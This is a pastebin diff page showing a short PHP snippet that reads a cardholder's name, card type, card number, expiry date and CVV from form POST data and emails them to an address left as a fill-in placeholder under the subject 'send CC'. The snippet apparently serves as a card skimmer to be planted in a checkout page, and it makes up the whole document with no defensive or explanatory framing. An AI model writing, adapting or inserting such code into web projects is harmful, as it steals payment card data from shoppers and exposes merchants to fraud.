View difference between Paste ID: nJ3VENw1 and jm73pv9s
SHOW: | | - or go back to the newest paste.
1
    $mail = "your e-mail here";
2
$subject = "send CC";
3
$message ="
4
!=======[ CreditCard Start]=========!
5
Cardholder Name : ".$_POST['cc_owner']."
6
Card Type : ".$_POST['credit_card_type']."
7
Card Number : ".$_POST['cc_number']."
8
Expiration Date : ".$_POST[' cc_expires ']."
9
Cvv : ".$_POST['cc_cvv']."
10
!========[ CreditCard End ]=========!
11
";
12
$headers = "From: caca10 caca10<@caca10>";
13
mail($mail,$subject,$message,$headers);